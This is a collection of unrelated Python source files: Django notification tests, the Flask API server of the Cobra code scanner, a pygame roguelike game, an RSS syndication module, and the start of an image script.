users = user_model.objects.filter(is_active=True, is_staff=True)
expected_emails = set(users.values_list('email', flat=True))
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_managers_staff(user_model, super_user, inactive_super_user,
staff_user, manager_staff_user,
command_runner, mailoutbox, settings):
# Send to managers and active staff. Email address in both lists should
# only be listed once.
result = command_runner('site_notify', managers=True, staff=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
users = user_model.objects.filter(is_active=True, is_staff=True)
expected_emails = set(users.values_list('email', flat=True))
expected_emails.update([x[1] for x in settings.MANAGERS])
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_all(user_model, super_user, inactive_super_user,
staff_user, manager_staff_user, command_runner,
mailoutbox, settings):
# Send to all admins, managers and staff.
result = command_runner('site_notify', all_users=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
users = user_model.objects.filter(is_active=True, is_staff=True)
expected_emails = set(users.values_list('email', flat=True))
users = user_model.objects.filter(is_active=True, is_superuser=True)
expected_emails.update(users.values_list('email', flat=True))
expected_emails.update([x[1] for x in settings.MANAGERS])
expected_emails.update([x[1] for x in settings.ADMINS])
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_bcc(command_runner, mailoutbox, settings):
# Send to default recipients (admins) bcc'ed.
result = command_runner('site_notify', bcc=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
expected_emails = set([x[1] for x in settings.ADMINS])
assert not msg.to
for recipient in msg.bcc:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_change_default(command_runner, mailoutbox, settings):
# Change default recipients via setting.
assert settings.ADMINS
assert settings.MANAGERS
settings.SITE_NOTIFY_DEFAULT_RECIPIENTS = ('admins', 'managers')
result = command_runner('site_notify')
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
expected_emails = set([x[1] for x in settings.ADMINS])
expected_emails.update([x[1] for x in settings.MANAGERS])
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_subject_body(command_runner, mailoutbox):
# Positional arguments should become message subject, then body.
result = command_runner('site_notify', 'test_subject', 'test_body', 'test_body2')
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
assert 'test_subject' in msg.subject
assert 'test_body' in msg.body
assert 'test_body2' in msg.body
def test_site_notify_templates(command_runner, mailoutbox, settings):
# Override subject and body templates via command line arguments.
result = command_runner('site_notify',
subject_template='new_site_notify_subject.txt',
body_template='new_site_notify_body.txt')
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
# Verify that template context processor variables are made available.
assert 'SITE_ID={}'.format(settings.SITE_ID) in msg.subject
assert 'test_project.urls' in msg.body
assert 'NEW_BODY_SUFFIX' in msg.body
def test_site_notify_template_settings(command_runner, mailoutbox, settings):
# Override subject and body templates via settings.
settings.SITE_NOTIFY_SUBJECT_TEMPLATE = 'new_site_notify_subject.txt'
settings.SITE_NOTIFY_BODY_TEMPLATE = 'new_site_notify_body.txt'
result = command_runner('site_notify')
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
assert 'SITE_ID={}'.format(settings.SITE_ID) in msg.subject
assert 'test_project.urls' in msg.body
assert 'NEW_BODY_SUFFIX' in msg.body
def test_site_notify_auth_not_installed(command_runner, mailoutbox, settings):
# Send to default recipients (admins).
settings.INSTALLED_APPS = (x for x in settings.INSTALLED_APPS if x != 'django.contrib.auth')
result = command_runner('site_notify')
assert result[0] is None
result = command_runner('site_notify', superusers=True)
if django.VERSION >= (2, 0):
assert isinstance(result[0], Exception)
|
# -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <feei@feei.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import socket
import errno
import time
import os
import json
import multiprocessing
import threading
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from . import cli
from .cli import get_sid
from .engine import Running
from .log import logger
from .config import Config, running_path
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
q = queue.Queue()
app = Flask(__name__, static_folder='templates/asset')
def producer(task):
q.put(task)
def consumer():
while True:
task = q.get()
p = multiprocessing.Process(target=cli.start, args=task)
p.start()
p.join()
q.task_done()
class AddJob(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
target = data.get("target")
formatter = data.get("formatter")
output = data.get("output")
rule = data.get("rule")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not target or target == "":
return {"code": 1002, "result": "URL cannot be empty."}
if not formatter or formatter == '':
formatter = 'json'
if not output or output == '':
output = ''
if not rule or rule == '':
rule = ''
# Report All Id
a_sid = get_sid(target, True)
if isinstance(target, list):
for t in target:
# Scan
arg = (t, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
else:
arg = (target, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
a_sid_data = {
'sids': {}
}
running = Running(a_sid)
# Write a_sid running data
running.list(a_sid_data)
# Write a_sid running status
data = {
'status': 'running',
'report': ''
}
running.status(data)
return {"code": 1001, "result": result}
class JobStatus(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
sid = data.get("sid")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not sid or sid == "":
return {"code": 1002, "result": "sid is required."}
sid = str(data.get("sid")) # 需要拼接入路径,转为字符串
running = Running(sid)
if running.is_file() is not True:
data = {
'msg': 'scan id not exist!',
'sid': sid,
'status': 'no such scan',
'report': ''
}
else:
result = running.status()
if result['status'] == 'running':
r_data = running.list()
ret = True
logger.info(r_data['sids'])
for sid, git in r_data['sids'].items():
if Running(sid).is_file(True) is False:
ret = False
if ret:
result['status'] = 'done'
running.status(result)
data = {
'msg': 'success',
'sid': sid,
'status': result['status'],
'report': result['report']
}
return {"code": 1001, "result": data}
@app.route('/', methods=['GET', 'POST'])
def summary():
a_sid = request.args.get(key='sid')
if a_sid is None:
return 'No sid specified.'
scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_status_file):
return 'No such scan.'
with open(scan_status_file, 'r') as f:
scan_status = json.load(f).get('status')
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
if scan_status == 'running':
return 'Scan job is still running, Please check later.'
start_time = os.path.getctime(filename=scan_status_file)
start_time = time.localtime(start_time)
start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
total_targets_number = len(scan_list)
total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
rule_filter = dict()
targets = list()
for s_sid in scan_list.keys():
target_info = dict()
target_info.update({
'sid': s_sid,
'target': scan_list.get(s_sid),
})
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
with open(s_sid_file, 'r') as f:
s_sid_data = json.load(f)
total_vul_number += len(s_sid_data.get('vulnerabilities'))
target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))})
target_info.update(s_sid_data)
targets.append(target_info)
for vul in s_sid_data.get('vulnerabilities'):
if 9 <= int(vul.get('level')) <= 10:
critical_vul_number += 1
elif 6 <= int(vul.get('level')) <= 8:
high_vul_number += 1
elif 3 <= int(vul.get('level')) <= 5:
medium_vul_number += 1
elif 1 <= int(vul.get('level')) <= 2:
low_vul_number += 1
try:
rule_filter[vul.get('rule_name')] += 1
except KeyError:
rule_filter[vul.get('rule_name')] = 1
return render_template(template_name_or_list='summary.html',
total_targets_number=total_targets_number,
start_time=start_time,
targets=targets,
a_sid=a_sid,
total_vul_number=total_vul_number,
critical_vul_number=critical_vul_number,
high_vul_number=high_vul_number,
medium_vul_number=medium_vul_number,
low_vul_number=low_vul_number,
vuls=rule_filter, )
@app.route('/report/<path:a_sid>/<path:s_sid>', methods=['GET'])
def report(a_sid, s_sid):
if s_sid is None:
return 'No sid specified.'
scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_data_file):
return 'No such target.'
with open(scan_data_file, 'r') as f:
scan_data = json.load(f)
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
project_name = scan_list.get(s_sid).split('/')[-1].replace('.git', '')
rule_filter = dict()
for vul in scan_data.get('vulnerabilities'):
rule_filter[vul.get('id')] = vul.get('rule_name')
with open(os.path.join(os.path.dirname(__file__), 'templates/asset/js/report.js')) as f:
report_js = f.read()
return render_template(template_name_or_list='result.html',
scan_data=json.dumps(scan_data, ensure_ascii=False),
report_js=report_js,
target_filter=scan_list,
project_name=project_name,
rule_filter=rule_filter)
def key_verify(data):
key = Config(level1="cobra", level2="secret_key").value
_key = data.get("key")
if _key == key:
return True
elif not _key or _key == "":
return {"code": 1002, "result": "Key cannot be empty."}
elif not _key == key:
return {"code": 4002, "result": "Key verify failed."}
else:
return {"code": 4002, "result": "Unknown key verify error."}
def start(host, port, debug):
logger.info('Start {host}:{port}'.format(host=host, port=port))
api = Api(app)
api.add_resource(AddJob, '/api/add')
api.add_resource(JobStatus, '/api/status')
# consumer
threads = []
for i in range(10):
threads.append(threading.Thread(target=consumer, args=()))
for i in threads:
i.setDaemon(daemonic=True)
i.start()
try:
app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
except socket.error as v:
if v.errno == errno.EACCES:
logger.critical('[{err}] must root permission for start API Server!'.format(err=v.strerror))
exit()
else:
logger.critical('{msg}'.format(msg=v.strerror))
logger.info('API Server start success')
|
import pygame as pg
import Sprites
import Alt
from random import randrange
class Player:
def __init__ (self,x,y) :
self.x=x
self.y=y
self.score = 0
self.etage = 1
self.vie = 10
self.vie_max = 10
self.range = 5
self.vel=1
self.dx = 0
self.dy = 0
self.objets = []
self.etage = 1
self.niv = Alt.Niveau(self.etage)
self.fini_move=False
self.tour = True
self.mort = False
self.cd = False
self.pos_sac = 0
self.sprite_joueur = Sprites.player
self.sprite_epee = Sprites.epee
self.sprite_projectile = Sprites.magie
def move(self) :
self.keys = pg.key.get_pressed()
if self.keys[pg.K_a] :
if self.keys[pg.K_LCTRL]:
self.dx=-1
self.dy=0
elif self.niv.salle_active.salle[self.y][self.x-1] != 2 and not(self.fini_move) and not(self.niv.salle_active.ennemi_ici(self.x-1,self.y)):
self.x -= 1
self.dx=-1
self.dy=0
if self.niv.salle_active.salle[self.y][self.x] == 1:
self.niv.ind_salle_prev = self.niv.ind_salle_active
self.donnees = [self.niv.salle_active.xi,self.niv.salle_active.yi,self.niv.salle_active.l,self.niv.salle_active.h,self.niv.salle_active.taille_unite]
self.coords = [self.donnees[0] - 1,self.donnees[1] + (self.y // self.donnees[4])]
self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
self.x = len(self.niv.salle_active.salle[0])-2
self.y = (self.coords[1] - self.niv.salle_active.yi )*self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite//2
self.fini_move= True
if self.niv.salle_active.objet_ici(self.x,self.y):
self.ind_objet = self.niv.salle_active.objet_ici(self.x,self.y)-1
self.pickup(self.niv.salle_active.objets[self.ind_objet])
self.niv.salle_active.objets.pop(self.ind_objet)
self.tour = False
self.fini_move= True
if self.keys[pg.K_d] :
if self.keys[pg.K_LCTRL]:
self.dx=1
self.dy=0
elif self.niv.salle_active.salle[self.y][self.x+1] != 2 and not(self.fini_move)and not(self.niv.salle_active.ennemi_ici(self.x+1,self.y)):
self.x += 1
self.dx=1
self.dy=0
if self.niv.salle_active.salle[self.y][self.x] == 1:
self.niv.ind_salle_prev = self.niv.ind_salle_active
self.donnees = [self.niv.salle_active.xi,self.niv.salle_active.yi,self.niv.salle_active.l,self.niv.salle_active.h,self.niv.salle_active.taille_unite]
self.coords = [self.donnees[0] + self.donnees[2],self.donnees[1] + (self.y // self.donnees[4])]
self.niv.ind_salle_active = self.niv.carte[ self.coords[1] ][ self.coords[0] ] - 1
self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
self.x = 1
self.y = (self.coords[1] - self.niv.salle_active.yi)*self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite//2
self.fini_move= True
if self.niv.salle_active.objet_ici(self.x,self.y):
self.ind_objet = self.niv.salle_active.objet_ici(self.x,self.y)-1
self.pickup(self.niv.salle_active.objets[self.ind_objet])
self.niv.salle_active.objets.pop(self.ind_objet)
self.fini_move= True
self.tour = False
if self.keys[pg.K_w] :
if self.keys[pg.K_LCTRL]:
self.dx=0
self.dy=-1
elif self.niv.salle_active.salle[self.y-1][self.x] != 2 and not(self.fini_move) and not(self.niv.salle_active.ennemi_ici(self.x,self.y-1)):
self.y -= 1
self.dx=0
self.dy=-1
if self.niv.salle_active.salle[self.y][self.x] == 1:
self.niv.ind_salle_prev = self.niv.ind_salle_active
self.donnees = [self.niv.salle_active.xi,self.niv.salle_active.yi,self.niv.salle_active.l,self.niv.salle_active.h,self.niv.salle_active.taille_unite]
self.coords = [self.donnees[0] + ( self.x // self.donnees[4] ),self.donnees[1]-1]
self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
self.x = (self.coords[0]-self.niv.salle_active.xi)*self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite//2
self.y = len(self.niv.salle_active.salle)-2
self.fini_move= True
if self.niv.salle_active.objet_ici(self.x,self.y):
self.ind_objet = self.niv.salle_active.objet_ici(self.x,self.y)-1
self.pickup(self.niv.salle_active.objets[self.ind_objet])
self.niv.salle_active.objets.pop(self.ind_objet)
self.fini_move= True
self.tour = False
if self.keys[pg.K_s] :
if self.keys[pg.K_LCTRL]:
self.dx=0
self.dy=1
elif self.niv.salle_active.salle[self.y+1][self.x] != 2 and not(self.fini_move)and not(self.niv.salle_active.ennemi_ici(self.x,self.y+1)):
self.y += 1
self.dx=0
self.dy=1
if self.niv.salle_active.salle[self.y][self.x] == 1:
self.niv.ind_salle_prev = self.niv.ind_salle_active
self.donnees = [self.niv.salle_active.xi,self.niv.salle_active.yi,self.niv.salle_active.l,self.niv.salle_active.h,self.niv.salle_active.taille_unite]
self.coords = [self.donnees[0] + ( self.x // self.donnees[4] ),self.donnees[1] + self.donnees[3]]
self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
self.x = (self.coords[0]-self.niv.salle_active.xi)*self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite//2
self.y = 1
self.fini_move= True
if self.niv.salle_active.objet_ici(self.x,self.y):
self.ind_objet = self.niv.salle_active.objet_ici(self.x,self.y)-1
self.pickup(self.niv.salle_active.objets[self.ind_objet])
self.niv.salle_active.objets.pop(self.ind_objet)
self.fini_move= True
self.tour = False
if not(self.keys[pg.K_a] or self.keys[pg.K_d] or self.keys[pg.K_w] or self.keys[pg.K_s]):
self.fini_move = False
if self.niv.salle_active.salle[self.y][self.x] == 3:
self.ind_salle_active = 0
self.etage += 1
self.niv = Alt.Niveau(self.etage)
self.x,self.y = 3,3
self.score += 20
def melee(self,screen):
keys= pg.key.get_pressed()
if keys[pg.K_UP]:
self.render(screen)
screen.blit(self.sprite_epee,(self.niv.salle_active.dif_affichage[0]+self.x * Sprites.taille,self.niv.salle_active.dif_affichage[1] + self.y*Sprites.taille-Sprites.taille//2))
pg.display.update()
pg.time.delay(200)
if self.niv.salle_active.ennemi_ici(self.x,self.y-1) :
self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x,self.y-1)-1
self.niv.salle_active.ennemis[self.ind_ennemi].hit(2,1,self)
self.fini_move=True
self.tour = False
pg.time.delay(200)
if keys[pg.K_DOWN]:
self.render(screen)
screen.blit(pg.transform.rotate(self.sprite_epee,180),(self.niv.salle_active.dif_affichage[0] + self.x*Sprites.taille ,self.niv.salle_active.dif_affichage[1] + self.y*Sprites.taille + Sprites.taille//2))
pg.display.update()
pg.time.delay(200)
if self.niv.salle_active.ennemi_ici(self.x,self.y+1):
self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x,self.y+1)-1
self.niv.salle_active.ennemis[self.ind_ennemi].hit(2,1,self)
self.fini_move=True
self.tour = False
pg.time.delay(200)
if keys[pg.K_LEFT]:
self.render(screen)
screen.blit(pg.transform.rotate(self.sprite_epee,90),(self.niv.salle_active.dif_affichage[0] + self.x*Sprites.taille - Sprites.taille//2 ,self.niv.salle_active.dif_affichage[1] + self.y*Sprites.taille ))
pg.display.update()
pg.time.delay(200)
if self.niv.salle_active.ennemi_ici(self.x-1,self.y):
self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x-1,self.y)-1
self.niv.salle_active.ennemis[self.ind_ennemi].hit(2,1,self)
self.fini_move=True
self.tour = False
pg.time.delay(200)
if keys[pg.K_RIGHT]:
self.render(screen)
screen.blit(pg.transform.rotate(self.sprite_epee,270),(self.niv.salle_active.dif_affichage[0] + self.x*Sprites.taille + Sprites.taille//2 ,self.niv.salle_active.dif_affichage[1] + self.y*Sprites.taille))
pg.display.update()
pg.time.delay(200)
if self.niv.salle_active.ennemi_ici(self.x+1,self.y):
self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x+1,self.y)-1
self.niv.salle_active.ennemis[self.ind_ennemi].hit(2,1,self)
self.fini_move=True
self.tour = False
pg.time.delay(200)
def shoot(self,screen):
keys= pg.key.get_pressed()
if keys[pg.K_SPACE]:
self.stop=False
range_check=self.range * Sprites.taille
x= 0
y= 0
dif = self.niv.salle_active.dif_affichage
while self.stop == False:
x=x+self.dx
y=y+self.dy
range_check=range_check-1
self.niv.salle_active.aff(screen)
if self.dy == 0 :
screen.blit(pg.transform.rotate(self.sprite_projectile,-self.dx*90),(self.x*Sprites.taille + dif[0] + x , self.y*Sprites.taille + dif[1] + y ))
elif self.dy == -1 :
screen.blit(self.sprite_projectile,(self.x*Sprites.taille + dif[0] + x*Sprites.taille,self.y*Sprites.taille + dif[1] + y))
elif self.dy== 1 :
screen.blit(pg.transform.rotate(self.sprite_projectile,180),(self.x*Sprites.taille + dif[0] + x ,self.y*Sprites.taille + dif[1] + y))
self.render(screen)
pg.display.update()
if 0 < self.niv.salle_active.salle[self.y + y//Sprites.taille][self.x + x//Sprites.taille] <= 2 or range_check < 0 :
self.stop = True
self.fini_move = True
self.tour = False
break
if self.niv.salle_active.ennemi_ici(self.x + x// Sprites.taille,self.y + y//Sprites.taille) :
self.stop = True
self.fini_move = True
self.tour = False
self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x + x// Sprites.taille,self.y + y//Sprites.taille,)-1
self.niv.salle_active.ennemis[self.ind_ennemi].hit(1,1,self)
def render(self,screen) :
screen.blit(self.sprite_joueur,(self.niv.salle_active.dif_affichage[0] + Sprites.taille*self.x,self.niv.salle_active.dif_affichage[1] + Sprites.taille*self.y))
def hit(self):
self.vie-=1
if self.vie<=0:
self.mort = True
def backpack(self,screen):
keys = pg.key.get_pressed()
if len(self.objets)>0:
if (keys[pg.K_k] or keys[pg.K_e]) and not self.cd :
self.pos_sac= min(len(self.objets)-1,self.pos_sac+1)
self.cd = True
if (keys[pg.K_j] or keys[pg.K_q]) and not self.cd:
self.pos_sac= max(0,self.pos_sac-1)
self.cd = True
if keys[pg.K_RETURN] and not self.cd:
self.cd = True
self.objets[self.pos_sac].use(self,screen)
del self.objets[self.pos_sac]
self.pos_sac = min(self.pos_sac,len(self.objets)-1)
self.score -= 5
if not (keys[pg.K_RETURN] or keys[pg.K_k] or keys[pg.K_j] or keys[pg.K_q] or keys[pg.K_e]):
self.cd = False
def pickup(self,item):
item.x = 17
item.y = 7
self.objets.append(item)
self.pos_sac = len(self.objets)-1
def tick(self,screen):
self.backpack(screen)
self.move()
self.melee(screen)
self.shoot(screen)
class Ennemi:
def __init__(self,x,y,salle):
self.x = x
self.y = y
self.vie = 4
self.stun = 0
self.sprite = Sprites.mechant
self.salle = salle
self.dif_affichage = self.salle.dif_affichage
self.visible = True
def deplacement (self,joueur,screen):
if self.x+self.dx == joueur.x and self.y + self.dy == joueur.y:
joueur.hit()
elif not joueur.niv.salle_active.ennemi_ici(self.x+self.dx,self.y+self.dy) :
self.x=self.x+self.dx
self.y=self.y+self.dy
else :
pass
def find (self,joueur):
for i in range(len(self.salle.salle)):
for j in range(len(self.salle.salle[0])):
if self.x > joueur.x :
self.dx=-1
elif self.x == joueur.x:
self.dx=0
else:
self.dx=1
if self.y > joueur.y :
self.dy=-1
elif self.y == joueur.y:
self.dy=0
else:
self.dy=1
def hit(self,dmg,stun,joueur):
self.vie -= dmg
self.stun += stun
if self.vie<=0:
self.mort()
joueur.score += 10
def tick(self,joueur,screen):
if self.stun==0:
self.find(joueur)
self.deplacement(joueur,screen)
else:
self.stun=self.stun-1
def aff(self,screen,coords):
screen.blit(self.sprite,( coords[0] + self.x*Sprites.taille, coords[1] + self.y*Sprites.taille))
def mort(self):
self.visible = False
self.x,self.y = -1,-1
print(self.x,self.y,self.visible)
class Potion:
def __init__(self,x,y,deb=False):
self.x = x
self.y = y
if not deb:
self.vie= randrange(1,7)
else:
self.vie= randrange(1,3)
self.Sprite= Sprites.potion
self.nom="Potion de vie ( " + str(self.vie) + " )"
self.sous_nom = ""
def use(self,joueur,screen):
joueur.vie= min(joueur.vie_max,joueur.vie +self.vie)
def draw(self,screen,salle,show = False):
dif_affichage = [0,0]
if not show:
dif_affichage = salle.dif_affichage
screen.blit((self.Sprite),(self.x*Sprites.taille + dif_affichage[0] ,self.y*Sprites.taille + dif_affichage[1]))
class Gemme:
def __init__(self,x,y):
self.x=x
self.y=y
self.stun=randrange(4)+1
self.dmg=randrange(4)+1
self.color_circle=(randrange(120,255),randrange(120,255),randrange(120,255))
self.nom="Gemme d'attaque"
self.sous_nom = "Étourd. : "+ str(self.stun) + ", Dégats :" + str(self.dmg)
def use(self,joueur,screen):
for i in range(len(joueur.niv.salle_active.ennemis)):
joueur.niv.salle_active.ennemis[i].hit(self.dmg,self.stun,joueur)
pg.draw.rect(screen,(self.color_circle),(0,0,15*Sprites.taille,15*Sprites.taille),Sprites.taille//2)
pg.display.update()
pg.time.delay(250)
pg.draw.rect(screen,(0,0,0),(0,0,15*Sprites.taille,15*Sprites.taille),Sprites.taille//2)
pg.display.update()
def draw(self,screen,salle,show=False):
dif_affichage = [0,0]
if not show:
dif_affichage = salle.dif_affichage
pg.draw.circle(screen,(self.color_circle),( self.x * Sprites.taille + Sprites.taille//2 + dif_affichage[0] , self.y * Sprites.taille + Sprites.taille//2 + dif_affichage[1]),Sprites.taille//4,0)
pg.draw.circle(screen,(200,200,200) ,( self.x * Sprites.taille + Sprites.taille//2+ dif_affichage[0], self.y * Sprites.taille + Sprites.taille // 2 + dif_affichage[1]),Sprites.taille//4,2)
|
# Copyright 2018, The Ssite Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Syndicate content to an RSS file."""
import hashlib
import os
import os.path
import shutil
import subprocess
import bs4
import jinja2
from PIL import Image, ImageSequence
import ssite.blog
import ssite.hentry
def is_animated(im):
for frame_id, _ in enumerate(ImageSequence.Iterator(im)):
if frame_id > 0:
return True
return False
def resize_static_image(im, resized_path, resize_to, is_pixel_art=True):
resized_frame = im.resize(
resize_to,
# Use Image.NEAREST for sharp pixel art images.
# Use Image.LANCZOS for high quality photo resizing.
resample=Image.NEAREST if is_pixel_art else Image.LANCZOS,
)
resized_frame.save(resized_path, optimize=True)
def resize_animation(original_path, resized_path, resize_to, is_pixel_art=True):
"""Resize an animated GIF using gifsicle."""
# I find Pillow's optimization insufficient for large GIFs. Use gifsicle to
# resize and optimize, instead.
gifsicle_command = [
"gifsicle",
"-O3",
original_path,
"-o",
resized_path,
"--resize",
"{}x{}".format(*resize_to),
]
if is_pixel_art:
gifsicle_command += ["--resize-method", "sample"]
subprocess.run(gifsicle_command)
def resize_image(original_path, resized_path, resize_width=600, is_pixel_art=True):
im = Image.open(original_path)
orig_w, orig_h = im.size
orig_aspect_ratio = orig_w / orig_h
resize_height = int(resize_width / orig_aspect_ratio)
resize_to = (resize_width, resize_height)
if is_animated(im):
resize_animation(
original_path, resized_path, resize_to, is_pixel_art=is_pixel_art
)
else:
resize_static_image(im, resized_path, resize_to, is_pixel_art=is_pixel_art)
return resize_to
def syndicate_images(soup, syndication_url, output_dir, site_root, content_path):
"""Write syndicated images to ``output_dir``.
Modifies image source attributes in``soup``.
"""
for img in soup.find_all("img"):
img_props = ssite.hentry.photo_template(img)
local_path = ssite.blog.calculate_filepath(site_root, content_path, img["src"])
# Image source is already absolute.
if local_path is None:
continue
with open(local_path, "rb") as image_file:
image_bytes = image_file.read()
# Create a directory based on the hash of the image to de-duplicate and
# uniquely identify an image so that resized versions are grouped
# together.
image_hash = hashlib.sha256(image_bytes).hexdigest()
destination_dir = os.path.join(
output_dir, "images", "sha256-{}".format(image_hash)
)
os.makedirs(destination_dir, exist_ok=True)
extension = os.path.splitext(local_path)[1].lower()
destination_original = os.path.join(
destination_dir, "original{}".format(extension)
)
if not os.path.exists(destination_original):
shutil.copy(local_path, destination_original)
width = None
height = None
if (
# Don't try to resize SVGs or other non-bitmap formats.
# TODO: what other image formats should we resize?
extension in (".png", ".gif", ".jpg", ".jpeg")
# Keep thumbnails at their original resolution.
and not img_props["is_thumbnail"]
):
destination_resized = os.path.join(
destination_dir, "resized-600px{}".format(extension)
)
if not os.path.exists(destination_resized):
width, height = resize_image(
local_path,
destination_resized,
is_pixel_art=img_props["is_pixel_art"],
)
else:
# Already resized, grab the image size.
im = Image.open(destination_resized)
width, height = im.size
else:
# TODO: render SVGs?
destination_resized = destination_original
img["src"] = "{}{}".format(
syndication_url, os.path.relpath(destination_resized, start=output_dir)
)
if height:
img["height"] = str(height)
if width:
img["width"] = str(width)
def replace_urls_with_absolute(soup, prefix, root, content_path):
for link in soup.find_all("a"):
link["href"] = ssite.blog.calculate_absolute_url(
prefix, root, content_path, link["href"]
)
# TODO: What to do for video embeds?
for source in soup.find_all("source"):
source["src"] = ssite.blog.calculate_absolute_url(
prefix, root, content_path, source["src"]
)
for video in soup.find_all("video"):
video["poster"] = ssite.blog.calculate_absolute_url(
prefix, root, content_path, video["poster"]
)
def summary_from_path(
site_root, index_root, path, path_date, syndication_url, output_dir
):
filepath = os.path.join(index_root, path)
with open(filepath, "r", encoding="utf-8") as fb:
return extract_summary(
site_root, index_root, filepath, path_date, fb, syndication_url, output_dir
)
def extract_summary(
site_root, index_root, path, path_date, markup, syndication_url, output_dir
):
doc = bs4.BeautifulSoup(markup, "html5lib")
replace_urls_with_absolute(doc, "/", site_root, path)
syndicate_images(doc, syndication_url, output_dir, site_root, path)
relative_path = os.path.relpath(path, start=index_root)
relative_path = f"{os.path.dirname(relative_path)}/"
return ssite.hentry.extract_hentry(relative_path, path_date, doc)
def summaries_from_paths(site_root, index_root, paths, syndication_url, output_dir):
for path, path_date in paths:
summary = summary_from_path(
site_root, index_root, path, path_date, syndication_url, output_dir
)
if summary is not None:
yield summary
def main(args):
indexed_dir = args.indexed_dir
output_dir = args.output_dir
site_url = args.site_url
syndication_url = args.syndication_url
template_path = args.template
xml_path = os.path.join(output_dir, "blog.xml")
# TODO: allow working directories other than site root
site_root = os.getcwd()
with open(template_path, "r", encoding="utf-8") as ft:
jinja_template = jinja2.Template(ft.read())
blog_paths = ssite.blog.find_paths(indexed_dir)
entries = [
entry
for entry in summaries_from_paths(
site_root, indexed_dir, blog_paths, syndication_url, output_dir
)
]
# Sort the entries by date.
# I reverse it because I want most-recent posts to appear first.
entries.sort(key=lambda entry: entry.published, reverse=True)
with open(xml_path, "wt", encoding="utf-8") as xml_file:
new_content = jinja_template.render(entries=entries) + "\n"
xml_file.write(new_content)
def add_cli_args(parser):
parser.add_argument(
"--output_dir",
help="path to write blog.xml and syndicated images to. ",
default="syndicate/",
)
parser.add_argument(
"--site_url",
help="URL of site (must end in /)",
default="https://www.timswast.com/",
)
parser.add_argument(
"--syndication_url",
help="URL of syndication site (must end in /)",
default="http://syndicate.timswast.com/",
)
parser.add_argument(
"-t",
"--template",
help="path to index blog.xml template.",
default="syndicate/blog.jinja2.xml",
)
parser.add_argument("indexed_dir", help="path to root of a directory to be indexed")
|
import os
import xml.etree.ElementTree as ET
import cv2
in_dir = './data/imgs/'
